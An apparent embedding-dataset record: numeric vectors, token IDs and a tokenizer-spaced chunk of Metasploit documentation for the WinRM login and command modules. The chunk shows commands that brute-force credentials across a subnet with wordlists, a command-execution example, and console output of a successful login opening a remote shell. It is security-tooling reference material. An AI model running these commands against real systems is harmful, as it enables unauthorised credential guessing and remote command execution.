[ -0.4058271050453186, -0.8063790798187256, -0.47527047991752625, 0.18490715324878693, -0.10685613006353378, -0.10228452831506729, -0.194407120347023, 0.19337159395217896, 0.06755196303129196, 0.3860214054584503, 0.24506129324436188, -0.3776955008506775, 0.3596062660217285, -0.5292115807533264, -0.586463987827301, -0.06729736179113388, 0.14605958759784698, 0.2998284697532654, -0.6261726021766663, -0.320320188999176, 0.5163583159446716, -0.344507098197937, -0.5555593371391296, -0.7049515843391418, -0.9422979354858398, 0.19307613372802734, 0.6897691488265991, -0.2257845401763916, 0.6231668591499329, 0.4581943452358246, 0.4235047698020935, -0.7201203107833862, 0.1338941752910614, -0.5532385110855103, 0.036074649542570114, -0.230120450258255, 0.9271572232246399, -0.2016572803258896, -0.07162250578403473, -0.8657670617103577, 0.5201452970504761, 0.001681621535681188, 0.08603169769048691, -0.44168439507484436, -0.13179530203342438, -0.639164388179779, -0.4007202386856079, 0.0360817015171051, 0.7311486601829529, -0.5004438161849976, 0.494314581155777, 0.4982602298259735, -0.22028425335884094, 0.2496352642774582, 0.5633766055107117, -0.23219691216945648, -0.5624054670333862, 0.21998552978038788, -0.029399486258625984, 0.028002437204122543, 0.051500070840120316, 0.6598341464996338, 0.23616386950016022, -0.4964708089828491, -0.002926648361608386, 0.27261272072792053, 0.3707808554172516, -0.5448245406150818, -0.17032623291015625, -0.6754200458526611, 0.4081103801727295, 0.16870662569999695, -0.4501139521598816, -0.7354463338851929, -0.5847251415252686, 0.1289827525615692, 0.26939791440963745, -0.09273095428943634, -0.43334466218948364, 0.6638959050178528, -0.030869973823428154, 0.602728545665741, 0.17433218657970428, -0.02543296106159687, -0.0076778423972427845, -0.035533759742975235, 0.7653825283050537, 1.1041338443756104, -0.5376777648925781, 0.2711557447910309, -0.025111708790063858, 0.4502030611038208, -0.7457894086837769, -0.14265373349189758, 0.1473263055086136, 0.6229691505432129, -0.012420169077813625, -0.03919754549860954, -0.3382285237312317, -0.17805834114551544, 0.2849375009536743, 0.8270167708396912, 0.4804179072380066, 0.06937728822231293, -0.020594259724020958, 0.7177872657775879, 0.5962027907371521, -0.3527081310749054, -0.11486472189426422, -0.5107153654098511, 0.2548121511936188, 0.16715341806411743, -0.3538343608379364, -0.39318373799324036, -0.02983994223177433, 0.4113544225692749, 0.4414839744567871, -0.35683760046958923, 0.13410313427448273, 0.8375257253646851, 0.05920808017253876, -0.7234238386154175, 0.09884170442819595, 0.2988147437572479, 0.16970045864582062, -0.2871350049972534, 0.5086060166358948, 0.27443456649780273, -0.7593090534210205, -0.39548686146736145, -0.2412402182817459, 0.0963834896683693, -0.02759147807955742, 0.6285898685455322, 0.46902570128440857, 0.3298967778682709, 0.2014235556125641, 0.48225128650665283, 0.6254391670227051, -0.7153698205947876, 0.17590589821338654, 0.7985365390777588, 0.2265407294034958, 1.1458990573883057, 0.36492884159088135, 0.05706526339054108, -0.2122744619846344, 0.19340935349464417, -0.24349981546401978, 0.517279326915741, -0.14741428196430206, 0.126756951212883, 0.781000554561615, -0.6686722040176392, -0.14094553887844086, -0.05773192644119263, -0.6530982851982117, 0.6986360549926758, -0.10377266258001328, 0.4482475519180298, -0.27241724729537964, 1.246215581893921, -0.13999274373054504, 0.7157877087593079, -0.14877751469612122, 0.09296128898859024, -0.477122038602829, -0.5779950618743896, -0.6215652227401733, 0.1418846994638443, 0.42631295323371887, -0.0007399183814413846, -0.14925648272037506, 0.003914030268788338, 1.1446795463562012, 0.8033730983734131, -0.3426196873188019, 0.12115959823131561, 0.436057448387146, 0.22090759873390198, -0.774563193321228, 0.3184996545314789, 0.294308602809906, 1.2027214765548706, -0.062227439135313034, -0.1593453586101532, 0.4335803985595703, -0.7010063529014587, -0.37859758734703064, -0.5224015712738037, -0.3383985757827759, -0.43464723229408264, -0.4696410596370697, 0.3925534784793854, 0.3509429097175598, -0.10510610044002533, -0.7917463779449463, -0.23345257341861725, 0.24159537255764008, -0.8173922300338745, -0.5357242822647095, 0.3019588589668274, -0.20152407884597778, 0.624177873134613, -0.22026754915714264, -0.22317305207252502, 0.4726766049861908, 0.3490196764469147, -0.02307332120835781, 0.8567318916320801, 0.934762716293335, -0.11022389680147171, -0.5176787972450256, -0.49743857979774475, 0.3406504988670349, -0.11995979398488998, -0.56651771068573, 0.4533189833164215, -0.5466633439064026, 0.030933422967791557, -0.01941525563597679, 0.8969537615776062, 0.9039521813392639, 0.07283984124660492, -0.8985078930854797, -0.2829441428184509, 0.06987010687589645, 0.1657617837190628, -0.3560084104537964, 0.652672290802002, -0.0010946921538561583, 0.4318408668041229, 0.6398089528083801, 1.0489671230316162, 0.5008741617202759, -0.656213104724884, 0.45170989632606506, 0.2976803779602051, 0.6047712564468384, -0.5227074027061462, 0.18165254592895508, 0.6178483963012695, 0.3827822506427765, 0.8402299284934998, 0.3156900107860565, 0.2919340133666992, -0.0907183513045311, -0.29393255710601807, 0.40015077590942383, 0.8597512245178223, -0.36733123660087585, 1.1613013744354248, 0.2940373420715332, -0.32563430070877075, -0.8993581533432007, -0.5337821841239929, 0.7074914574623108, 0.5627397298812866, -0.7439086437225342, -1.2328611612319946, -0.02194022573530674, -0.03607393056154251, -1.0458505153656006, 0.027604034170508385, 0.372551292181015, 0.60410475730896, -0.016386061906814575, -0.2500069737434387, 0.5261703729629517, -0.412375271320343, -1.0320591926574707, 0.2511803209781647, -0.44916149973869324, -0.7584998607635498, -0.843180775642395, 0.08710041642189026, -0.14255940914154053, -0.19341063499450684, 0.7011875510215759, -0.0506499744951725, -0.6626339554786682, 0.0227555800229311, -0.05693528801202774, 0.5953975319862366, 0.5581084489822388, -0.3964363932609558, -0.8843314051628113, -0.21911589801311493, -0.14912037551403046, 0.22852155566215515, -0.34757673740386963, -0.07231777906417847, -0.23942121863365173, -0.4726206064224243, 0.17371055483818054, -0.3339647054672241, 0.7537808418273926, -0.24103112518787384, 0.2528560757637024, 0.023220444098114967, -0.3522152304649353, -0.1609341949224472, 0.3660491108894348, -0.22788044810295105, 0.2943327724933624, 0.5508690476417542, -0.0023986243177205324, 0.014014523476362228, 0.7459589242935181, 0.3771507143974304, -0.745289146900177, 0.43626588582992554, 0.15703509747982025, 0.755639910697937, -0.8949391841888428, 0.6859594583511353, 0.5236621499061584, -0.25778281688690186, -0.08292125165462494, -0.4853651821613312, -0.055850736796855927, -0.18134206533432007, -0.38519415259361267, -0.10833464562892914, -0.5529839396476746, 0.3358829915523529, -0.1665787547826767, -0.6498298048973083, 0.5281428694725037, -0.1727687418460846, -0.31232741475105286, 0.07289217412471771, -0.25901004672050476, 0.5616405606269836, -0.3262023627758026, 0.3731105327606201, -0.49242743849754333, -0.4908406436443329, -0.14834865927696228, -0.053373415023088455, -0.30045074224472046, -0.5140612721443176, 0.18276186287403107, 0.03816874325275421, -0.8685802817344666, 0.4727872908115387, 0.7935936450958252, -0.6457009315490723, 0.22612279653549194, -0.6036333441734314, -0.2063748985528946, -0.20825758576393127, 0.6665524840354919, 0.14415356516838074, 0.07781755179166794, 0.9231540560722351, -0.9635486006736755, -0.28334280848503113, 0.43134593963623047, 0.3153209090232849, 0.4758099913597107, -0.10499200969934464, -0.5418317317962646, 0.21778781712055206, -0.2662925720214844, -0.6498568654060364, 0.4642329812049866, 0.7674989700317383, 0.4568520188331604, -0.5063278675079346, 0.5681002736091614, -0.21760548651218414, 0.04989812895655632, 0.44553446769714355, -0.13941405713558197, -0.3324991762638092, 0.8520877361297607, 0.2687508761882782, 0.5959020256996155, -0.9474809169769287, 0.3787597715854645, -0.039666548371315, 0.0904150903224945, 0.10427163541316986, 0.03874899446964264, -0.33349609375, -0.3135252594947815, -0.373598575592041, 0.17009933292865753, 0.11156100034713745, -0.03740967810153961, -0.3044854998588562, 0.11354581266641617, 0.2203522026538849, -0.8654305338859558, -0.062278322875499725, 1.082572102546692, 0.4174691438674927, 0.18892787396907806, 0.73667973279953, 0.8928532004356384, 0.14405998587608337, -0.29451602697372437, 0.03598416596651077, -0.583976149559021, 0.7843566536903381, 0.416000634431839, 0.6933532953262329, -0.3755098581314087, -0.3628525733947754, -0.17907924950122833, -0.29435768723487854, -0.14717626571655273, 0.12948419153690338, 0.015843795612454414, -0.2587001919746399, -0.17290861904621124, -0.5952712297439575, 0.449820876121521, 0.10455518960952759, -0.44007614254951477, -0.3934437036514282, -0.6834462285041809, 0.569344699382782, 0.24492500722408295, -0.28432151675224304, -0.14116591215133667, -0.8310546278953552, 0.47566428780555725, 0.3592255711555481, -0.044079799205064774, -0.06407644599676132, -0.6516629457473755, -0.25493937730789185, -0.43995577096939087, 0.4993809461593628, 0.283385306596756, -0.22763551771640778, -0.3458496034145355, -0.3554168939590454, -0.5059001445770264, -0.26693201065063477, -0.06938407570123672, -0.5571121573448181, -0.2546449601650238, 0.40533876419067383, 0.3625345230102539, 0.23522058129310608, -0.2947610020637512, -0.22556756436824799, 0.2610865831375122, 0.17549870908260345, 0.6267185211181641, -0.6956388354301453, 0.4567902386188507, -0.01859886758029461, -0.29490646719932556, 0.37998631596565247, 0.17666557431221008, -0.515728235244751, 0.1089625135064125, -0.30830198526382446, 0.5583144426345825, -0.29258403182029724, -0.25598472356796265, 0.5476382374763489, -0.01172826997935772, -0.232612743973732, 1.0290861129760742, 0.6495921015739441, -0.2748929560184479, 0.5332064628601074, -0.20489563047885895, -0.5883843302726746, 0.5198023915290833, -0.7823764681816101, 0.49299299716949463, 0.32565563917160034, 0.06042394042015076, 0.04976201802492142, -0.5107856392860413, 1.3190691471099854, 0.2676181197166443, 0.6209781169891357, -0.8119524121284485, -0.26561570167541504, 0.4445040225982666, 0.470743864774704, 0.2769661843776703, 0.555572509765625, -0.2573253810405731, -0.13377681374549866, 0.3919091820716858, 0.0002515086380299181, -0.7143157124519348, -0.20899468660354614, 0.21050022542476654, -0.2623840868473053, -0.3048972487449646, -0.5931143760681152, 0.35418015718460083, -0.625071108341217, -0.5106788277626038, -0.020385226234793663, -0.13976402580738068, -0.05919601395726204, -1.3135697841644287, 0.02677706629037857, -0.5080599784851074, -0.3483497202396393, -0.5418090224266052, -0.10901597887277603, -0.46624764800071716, 0.3361000418663025, 0.07429655641317368, 0.592087984085083, -0.038138002157211304, -0.5105966925621033, -0.17142556607723236, 0.19372892379760742, -0.09438204020261765, -0.9081969857215881, 0.20757392048835754, 0.5394116640090942, 0.047648876905441284, 0.4833945035934448, -0.5102613568305969, -0.19518259167671204, -0.7212703824043274, -0.37695369124412537, -0.6047447323799133, -0.3087267279624939, 0.07873749732971191, -0.8794598579406738, -0.7832566499710083, -0.5283122062683105, 0.7103115916252136, 0.07617605477571487, -1.1884270906448364, 0.5438134074211121, -0.4735115170478821, 0.636732280254364, -0.3466532826423645, 0.007582017686218023, -0.19108819961547852, -0.7686246037483215, -0.48412853479385376, 0.6714566946029663, -0.21110421419143677, -0.057482194155454636, -0.08771750330924988, -0.04925528168678284, 0.18819987773895264, -0.01994078792631626, -0.5420787930488586, -0.10521018505096436, 0.08672516793012619, 0.14110606908798218, 0.09794499725103378, 0.17843540012836456, -0.6090914011001587, 0.8577914834022522, -0.1877070814371109, 0.09195085614919662, -0.20496679842472076, -0.12475045025348663, -0.39267879724502563, -0.008563813753426075, 1.2576133012771606, -0.529391348361969, -0.028618331998586655, 0.09354199469089508, 0.6874293684959412, 0.33009016513824463, -0.40545469522476196, -0.5240601897239685, 0.03436143696308136, -0.8216015696525574, -0.7811950445175171, 0.390130877494812, 0.017810137942433357, -0.09872279316186905, 0.8706614971160889, -0.22367961704730988, 0.42030444741249084, -0.1696149706840515, 0.24496081471443176, 0.5115199685096741, -0.40958884358406067, 0.5749554634094238, -1.075939416885376, 0.6644883155822754, 0.6468394994735718, 0.058947931975126266, 0.09052787721157074, -0.182013139128685, -0.014886263757944107, -0.012961655855178833, -0.45506080985069275, -0.7753193378448486, -0.36491385102272034, -0.739867091178894, 0.5830733776092529, -0.8050006031990051, 0.10458877682685852, -0.16182895004749298, -0.7785367965698242, -0.1199270710349083, 0.17158420383930206, -0.292999267578125, -0.6575474739074707, 0.43846067786216736, 0.72611004114151, 0.2788614332675934, -0.39972665905952454, 0.37181180715560913, 0.17699751257896423, -0.2920975089073181, 0.6520219445228577, 0.37169352173805237, -0.5986518859863281, 0.9561766982078552, 0.10193213820457458, -0.9031202793121338, -0.502375066280365, -1.189887523651123, 0.041326314210891724, -0.1738782525062561, -0.32427501678466797, -0.37634918093681335, -0.32310202717781067, 0.2956349551677704, -0.6521347761154175, 0.41780632734298706, 0.2345326542854309, 0.08514609187841415, -1.0752270221710205, 0.8595190644264221, -0.11806292086839676, 0.05402444303035736, 0.3864535391330719, -0.44699281454086304, -0.08773341029882431, -1.2188173532485962, -0.31190866231918335, 0.06654879450798035, 0.6609359383583069, 0.4840044677257538, -0.2064386010169983, 0.8536215424537659, 0.33397579193115234, -0.46311458945274353, 0.650052547454834, -0.20617549121379852, 0.35003361105918884, 0.8101992011070251, 0.3786790668964386, -0.7311026453971863, -0.40062883496284485, 0.28381481766700745, -0.17463311553001404, 0.24134080111980438, -0.23543210327625275, -0.40331244468688965, -0.09077674150466919, 0.16970671713352203, 0.26750674843788147, -0.4788866937160492, -0.37433069944381714, -0.8682981133460999, -0.05087185651063919, 0.13216885924339294, 0.09584728628396988, -0.29237568378448486, -0.11277200281620026, -0.3934607207775116, -0.32986319065093994, -1.1733663082122803, -0.07060910016298294, -0.15317124128341675, 0.2176579236984253, -0.42072606086730957, 0.48538756370544434, -0.6992705464363098, -0.6700060963630676, -0.33447131514549255, 0.005103094503283501, -0.3949456512928009, -0.8610178828239441, -0.06546313315629959, -0.38191428780555725, -0.23779349029064178, -0.0005373574676923454, -0.6954248547554016, -0.12160050123929977, 0.036035824567079544, -0.17586764693260193, -0.30523958802223206, 0.5443610548973083, -0.44364044070243835, 0.23289908468723297, 0.27153265476226807, -0.16923296451568604, 0.6687222123146057, -0.5934686660766602, -0.13326238095760345, 0.05124512314796448, -0.1910424381494522, 0.6286358833312988, 0.06866827607154846, -0.3746563196182251, -0.2809486389160156, 0.12672877311706543, -0.7128358483314514, 0.09561391174793243, -0.9268410205841064, 0.2450667768716812, 0.2797606587409973, -0.35936734080314636, -0.07311974465847015, 0.44337141513824463, 0.4093516170978546, 0.044167790561914444, -0.1065642312169075, 0.6015214323997498, 0.13345323503017426, -0.13775894045829773, 0.2752849757671356, 0.12604384124279022, 0.24597232043743134, -0.8789499998092651, -0.17497138679027557, 0.372213214635849, -0.38654598593711853, 0.1723448783159256, -0.29912203550338745, -0.20377881824970245, -0.23567131161689758, -0.33822375535964966, 0.3827124834060669, 0.09361489117145538, 0.7907259464263916, 0.4443349838256836, 0.4720144271850586, -0.23427622020244598, -0.8537222146987915, 0.36077186465263367, -0.7225112318992615, -0.188730850815773, 0.12508223950862885, -0.30287832021713257, -0.16923858225345612, -0.6143834590911865, -0.37526291608810425, -0.07567201554775238, 0.12458828836679459, -0.23608331382274628, 0.4880783259868622, 0.2460901439189911, 0.4517747461795807, 1.6334936618804932, -0.1907285451889038, 0.02809295244514942, -0.7404829263687134, 0.8990548253059387, -0.7311169505119324, -1.3475621938705444, 0.0565822497010231, 0.82860267162323, 0.2683406174182892, 0.8437680602073669, -0.8328424096107483, -0.03462638705968857, 0.2842157483100891, 0.34823912382125854, -0.3388330340385437, 0.18796972930431366, -0.2344682812690735, 0.6217683553695679, -0.6983411908149719, 0.3661111295223236, -0.09462468326091766, -0.255034863948822, 0.08032753318548203, 0.1613510251045227, -0.23120340704917908, 0.44082218408584595, -0.20365162193775177, -0.3487163484096527, 0.5787129998207092, 0.41460320353507996, 0.25822046399116516, -0.40505099296569824, 0.12334288656711578, -0.17560862004756927, 0.30723318457603455, 0.004078619182109833, 0.49056050181388855, -0.20380279421806335, 0.17806744575500488, 0.7431923151016235, -0.8751627206802368, -0.4998875856399536, 0.5624256730079651, -0.161997988820076, -0.549386203289032, 0.31948286294937134, -0.32527559995651245, 0.3278938829898834, -0.37865927815437317, -0.32314997911453247, -0.2496030181646347, 0.4575200378894806, 0.47746706008911133, 0.6109545230865479, -0.04740331694483757, 1.0733027458190918, 0.10214760899543762, 0.48859167098999023, 0.08607599884271622, -0.11042184382677078, 0.3711444139480591, 0.06332949548959732, -0.02149941399693489, -0.2385784387588501, 1.4737187623977661, 0.22497084736824036, -0.23274196684360504, 0.6282393932342529, 0.02505537122488022, 0.047116585075855255, 0.15618859231472015, 0.1912035048007965, -0.9297837018966675, 0.24401862919330597, -0.34259510040283203, -0.18226014077663422, -0.3729998469352722, 0.18490208685398102, -0.0610833615064621, -0.033146247267723083, 0.34321820735931396, -0.07823500782251358, 0.40526241064071655, -0.7155922651290894, -0.09290175139904022, -0.7207080125808716, 0.003528058994561434, 0.2660997807979584, -0.32590916752815247, -0.06578360497951508, 0.8966981768608093, 0.20043468475341797, 0.76558917760849, -0.2530396580696106, 1.5121526718139648, 0.31933093070983887, 0.27741140127182007, 0.3103017807006836, -0.4288911521434784, -0.5990780591964722, -0.10907121002674103, -0.4817219376564026, -0.15884345769882202, -0.17704160511493683, -0.5123938918113708, 0.6412885785102844, 0.021703394129872322, -0.2811878025531769, -0.6367433667182922, 0.18602833151817322, -0.6006327271461487, -0.5593002438545227, 0.7431697249412537, -0.16750697791576385, 0.04692716896533966, -0.5147507190704346, 0.7843508720397949, -0.0677078366279602, 0.5998231172561646, -0.7014539837837219, -0.532825231552124, -0.8537399768829346, -0.2865457236766815, -0.09023033082485199, 0.8429397344589233, -0.17994052171707153, -0.04236295819282532, 0.12788644433021545, -0.9620333909988403, -0.8034452199935913, 0.18542490899562836, -0.5464341640472412, -0.2301190346479416, 1.0153273344039917, 0.1928548663854599, 0.5438718795776367, -0.5264167189598083, -0.7285330295562744, -0.33749616146087646, -0.07426822185516357, 0.6291709542274475, 0.1327412724494934, 0.4138844907283783, 0.26773300766944885, 0.21942654252052307, 0.21531933546066284, 0.45934319496154785, 0.6552805304527283, -0.3805461525917053, -0.252991646528244, -0.17036749422550201, -0.26328417658805847, -0.5190783739089966, -0.5148370265960693, -0.0712311640381813, 0.23685352504253387, 0.3492891788482666, -0.29139283299446106, -0.7677798271179199, -0.417003870010376, -0.34394046664237976, 0.25889506936073303, 0.19702467322349548, 0.24656282365322113, -0.060254912823438644, -0.4953276813030243, 0.6597563624382019, -1.1696523427963257, 4.429049015045166, 0.8222357034683228, -0.23156489431858063, 0.07282181084156036, 0.25883474946022034, 1.1007177829742432, 0.9035378694534302, -0.6147823333740234, 0.6842896342277527, -0.05220355466008186, 0.482959121465683, -0.5308666229248047, 0.6709204316139221, -0.16130702197551727, 0.6315799951553345, 0.6599851250648499, -0.37177181243896484, 0.47758203744888306, 0.5455419421195984, -0.7922952771186829, -0.19733482599258423, -0.008177049458026886, -0.551795244216919, 0.8395718932151794, 0.16074256598949432, 0.19509989023208618, 0.3070667088031769, -0.19427983462810516, -0.013191069476306438, -0.44051310420036316, -0.04677800461649895, -0.5499693751335144, 0.1748991757631302, -0.193365216255188, -0.9076818823814392, 0.07830510288476944, -0.25074490904808044, -0.6746124029159546, 0.017844341695308685, -0.25235360860824585, 0.8268226981163025, 0.1618383228778839, -0.05687851458787918, -0.17354071140289307, 0.13220883905887604, 0.33942699432373047, -0.5827404260635376, -0.38301384449005127, 0.8470195531845093, -0.5130059123039246, 0.68910151720047, 0.15801067650318146, 0.9968947172164917, 0.49406349658966064, -0.8461508750915527, 0.16639487445354462, -0.4009142518043518, -0.4812704026699066, -0.20061878859996796, 0.2521859407424927, 0.9238489866256714, -0.579140841960907, 0.21913360059261322, -0.07872878760099411, -0.6850643157958984, 0.7227514982223511, -0.05431203916668892, 0.40682730078697205, 0.14285016059875488, -0.17205625772476196, 0.20188239216804504, -0.1629815399646759, -0.45373985171318054, -0.5701728463172913, 0.5095996260643005, -0.06600744277238846, 0.3076034188270569, -0.11530163884162903, 0.7929680347442627, -0.3736027777194977, -0.06224394589662552, -0.17623811960220337, -0.8774545788764954, -0.011594366282224655, 0.9363831281661987, 0.44477343559265137, -0.2820191979408264, -0.9317537546157837, -0.2555975019931793, 0.4840445816516876, 0.40853816270828247, 0.04865378141403198, -0.8110975623130798, 0.20748595893383026, 0.19198426604270935 ]
[ 101, 2663, 10867, 2147, 12314, 26760, 22254, 15568, 6556, 2968, 1006, 2663, 10867, 1007, 1010, 2003, 1037, 2126, 2005, 7846, 2000, 19512, 6133, 3645, 7588, 1012, 2663, 10867, 2003, 2328, 2006, 2327, 1997, 1996, 3722, 4874, 3229, 8778, 1006, 7815, 1007, 2058, 8299, 1006, 1055, 1007, 1012, 2045, 2024, 2048, 2364, 8831, 2005, 2663, 10867, 1024, 5354, 27531, 1013, 22975, 2361, 1011, 8299, 28154, 20842, 1013, 22975, 2361, 1011, 16770, 2239, 3080, 4617, 1997, 3645, 2107, 2004, 3645, 1021, 1013, 3645, 8241, 2263, 1996, 2206, 8831, 2020, 2109, 1024, 3770, 1013, 22975, 2361, 1011, 8299, 22932, 2509, 1013, 22975, 2361, 1011, 16770, 5714, 6442, 4630, 1024, 2077, 2770, 1996, 4217, 2663, 10867, 18804, 13102, 4135, 4183, 11336, 1010, 2034, 5676, 2008, 1996, 1054, 6442, 1998, 7020, 2140, 5300, 2024, 26928, 11178, 1012, 2593, 2007, 1996, 2715, 23881, 5724, 2490, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8740, 2705, 1035, 4725, 2448, 24471, 2140, 2448, 24471, 2140, 2030, 2011, 21118, 4292, 7047, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8740, 2705, 1035, 4725, 2275, 1054, 15006, 2102, 17613, 1012, 16923, 1012, 13138, 1012, 16621, 2275, 1054, 6442, 5354, 27531, 2275, 7020, 2140, 6270, 2448, 18804, 13102, 4135, 4183, 2038, 2490, 2005, 3674, 2663, 10867, 14184, 1010, 2164, 1024, 27280, 4372, 17897, 8156, 6299, 11787, 1013, 26128, 29278, 6129, 22496, 15532, 5582, 10954, 1998, 3098, 6521, 12399, 2063, 2024, 2062, 14184, 2084, 3205, 2182, 1010, 2005, 1996, 2440, 2862, 1997, 14184, 2448, 1996, 3945, 3094, 2306, 5796, 11329, 5644, 9890, 1024, 5796, 2546, 2575, 1028, 3945, 2663, 10867, 6845, 4044, 10760, 2663, 10867, 14184, 2147, 2114, 3645, 12107, 2029, 2031, 2663, 10867, 5361, 1998, 26928, 1012, 2005, 1037, 5884, 11486, 1996, 3499, 6556, 8241, 2968, 2083, 2663, 10867, 3343, 2097, 2342, 2022, 9124, 1012, 2009, 2003, 2069, 2825, 2000, 2224, 2663, 10867, 2114, 6115, 2029, 2024, 2112, 1997, 1996, 6556, 2968, 5198, 2177, 1012, 2663, 10867, 2058, 16770, 5942, 1996, 4325, 1997, 1037, 8241, 14469, 5844, 8196, 1010, 2004, 2092, 2004, 12067, 1996, 3665, 5549, 1024, 2663, 10867, 4248, 8663, 8873, 2290, 1011, 3665, 1024, 16770, 27280, 4372, 17897, 8156, 2368, 17897, 11657, 2663, 10867, 27280, 10595, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8740, 2705, 1035, 4725, 2448, 24471, 2140, 2448, 24471, 2140, 2742, 1024, 5796, 2546, 2575, 9830, 1006, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8740, 2705, 1035, 4725, 1007, 1028, 2448, 24471, 2140, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 16621, 1024, 5354, 27531, 1024, 13676, 8778, 3569, 1031, 1009, 1033, 17613, 1012, 16923, 1012, 13138, 1012, 16621, 1024, 5354, 27531, 1024, 17710, 20473, 2891, 8778, 3569, 1031, 1008, 1033, 11728, 1015, 1997, 1015, 6184, 1006, 2531, 1003, 3143, 1007, 1031, 1008, 1033, 9830, 11336, 7781, 2949, 2663, 10867, 26128, 14821, 19892, 10421, 1011, 2486, 3677, 2007, 2124, 5310, 1998, 20786, 2862, 1024, 2224, 26221, 1013, 2663, 10867, 1013, 2663, 10867, 1035, 8833, 2378, 2448, 24471, 2140, 16457, 1027, 2753, 3413, 1035, 5371, 1027, 1012, 1013, 2773, 9863, 1012, 19067, 2102, 26128, 1011, 2486, 22496, 1024, 2224, 26221 ]
metasploit
13.txt
0
/ winrm / winrm _ login run url threads = 50 user _ file =. / users. txt pass _ file =. / wordlist. txt brute - force credentials in a subnet : use scanner / winrm / winrm _ login run cidr : / 24 : http : / / user : pass @ 192. 168. 222. 0 : 5985 threads = 50 run cidr : / 24 : http : / / user @ 192. 168. 222. 0 : 5985 threads = 50 pass _ file =. / wordlist. txt winrm cmdto execute arbitrary commands against a windows target : use scanner / winrm / winrm _ cmd run url cmd ='whoami ; ipconfig ; systeminfo'winrm login sessionif you have valid credentials the scanner / winrm / winrm _ login module will open a metasploit session for you : use scanner / winrm / winrm _ login run url example : msf6 auxiliary ( scanner / winrm / winrm _ login ) > run url [! ] no active db - - credential data will not be saved! [ + ] 192. 168. 123. 139 : 5985 - login successful : workstation \ user : pass [ * ] command shell session 7 opened ( 192. 168. 123. 1 : 58673 - > 192. 168. 123. 139 : 5985 ) at 2022 - 04 - 23 02 : 36 : 34 + 0100 [ * ] scanned 1 of 1 hosts ( 100 % complete ) [ * ] auxiliary module execution completed msf6 auxiliary ( scanner / winrm / winrm _ login ) > sessions - i - 1 [ * ] starting interaction with 7... microsoft windows [ version 10. 0. 14393 ] ( c ) 2016 microsoft corporation. all rights reserved. c : \ users \ user > kerberos authenticationdetails on the kerberos specific option names are documented in kerberos service authenticationopen a winrm session : msf6 > use auxiliary / scanner / winrm / winrm _ login msf6 auxiliary ( scanner / winrm / winrm _ login ) > run rhost = 192. 168. 123. 13 username = administrator password = p4 $ $ w0rd winrm : : auth = kerberos domaincontrollerrhost = 192. 168
[ 0.01879958249628544, -0.578646719455719, -0.002891730749979615, 0.1718825250864029, -0.23764899373054504, -0.2995537221431732, -0.5947726964950562, 0.3451034426689148, 0.08994527906179428, 0.28332623839378357, -0.17845481634140015, -0.01005526166409254, 0.31102538108825684, -0.3121447265148163, -0.5855121612548828, 0.28640976548194885, 0.018680689856410027, -0.15141555666923523, -0.786363959312439, 0.041122905910015106, -0.1505497694015503, -0.08335652947425842, -1.1694515943527222, -0.7448068857192993, -0.19752436876296997, 0.6058187484741211, 0.7134436368942261, -0.057037994265556335, 0.39880672097206116, 0.11922373622655869, 0.10140075534582138, -0.46365445852279663, 0.08439049124717712, -0.45035606622695923, 0.19602029025554657, 0.027906714007258415, 0.7639188766479492, -0.2844735085964203, 0.3074261248111725, -0.5963869690895081, 0.45960381627082825, -0.24371060729026794, 0.3195835053920746, -0.5160566568374634, -0.3790331482887268, -1.0161176919937134, 0.3217681050300598, -0.32669562101364136, 0.31101253628730774, 0.38202184438705444, 0.5280075669288635, 0.6367649435997009, -0.37834349274635315, -0.091729074716568, -0.19778795540332794, -0.09730002284049988, -0.6071792244911194, -0.34167006611824036, -0.2100330889225006, 0.12148492783308029, -0.2560920715332031, 1.1294677257537842, 0.4875979423522949, -0.9280740022659302, 0.014013930223882198, 0.5036571025848389, -0.05423334985971451, -0.4615017771720886, -0.520607590675354, -0.8133634328842163, -0.040747616440057755, 0.5467067360877991, -0.6679529547691345, -0.4804973900318146, -0.7188600897789001, -0.09174803644418716, -0.10011757165193558, 0.11935403943061829, -0.2142505943775177, 0.35966750979423523, 0.08170848339796066, 0.3111765682697296, 0.024863367900252342, -0.2105768322944641, 0.11137676984071732, -0.264197438955307, 1.1064246892929077, 1.0792633295059204, -0.3569055199623108, 0.508742094039917, 0.6969081163406372, 0.552141010761261, -0.5158709287643433, -0.6428091526031494, -0.0788649171590805, 0.9322211146354675, -0.6089982986450195, 0.06435976922512054, 0.2034197896718979, -0.06876721978187561, 0.616050660610199, 0.48111292719841003, -0.03411528095602989, -0.053881846368312836, -0.2506425380706787, 0.2234892100095749, 0.11030563712120056, -0.667365550994873, 0.339261919260025, -0.7270813584327698, 0.8546348214149475, -0.21653497219085693, 0.2944920063018799, -0.4865570068359375, 0.1799476444721222, 0.48112785816192627, 0.023425061255693436, -0.13105624914169312, 0.13156622648239136, 0.7999017238616943, -0.3053589463233948, -0.3136046826839447, 0.26459911465644836, -0.1777428686618805, 0.19256989657878876, -0.18659627437591553, -0.5192510485649109, 0.5036416053771973, -0.7412165999412537, -0.5363384485244751, 0.04373043030500412, -0.27758195996284485, -0.4240238070487976, 0.3506663739681244, -0.12136589735746384, 0.2443898320198059, 0.05266387388110161, 0.2659391760826111, 0.6106191277503967, -0.6205801963806152, 0.13233458995819092, 0.6375875473022461, 0.5090821981430054, 1.8836747407913208, 0.5017141103744507, 0.10111803561449051, -0.3545045852661133, 0.6523287296295166, -0.5468449592590332, 0.33059215545654297, -0.5697532892227173, -0.23538914322853088, 0.7311947345733643, -0.49609091877937317, -0.7116593718528748, 0.4749264717102051, -0.39116889238357544, 0.33139991760253906, -0.9813328981399536, 0.3943841755390167, -0.43484431505203247, 0.9767235517501831, -0.3212038576602936, 0.08006136119365692, 0.2350621074438095, 0.26818451285362244, -0.7436951398849487, -0.6120474934577942, -0.28416115045547485, -0.5311926603317261, 0.5086550116539001, 0.0371357761323452, 0.30001795291900635, 0.34871387481689453, 1.6078730821609497, 0.9307326674461365, -0.059735722839832306, 0.06702644377946854, 0.4241371154785156, 0.3098505139350891, -0.9957202672958374, 0.2050338238477707, 0.2728154957294464, 1.158020257949829, 0.17714755237102509, 0.21898730099201202, 0.042450543493032455, -0.5952085852622986, -0.2781260013580322, -0.5893858671188354, -0.3017210066318512, 0.406586229801178, -0.44658538699150085, 0.5590783357620239, 1.0730774402618408, 0.31481754779815674, -0.988213837146759, 0.29869043827056885, -0.18224738538265228, 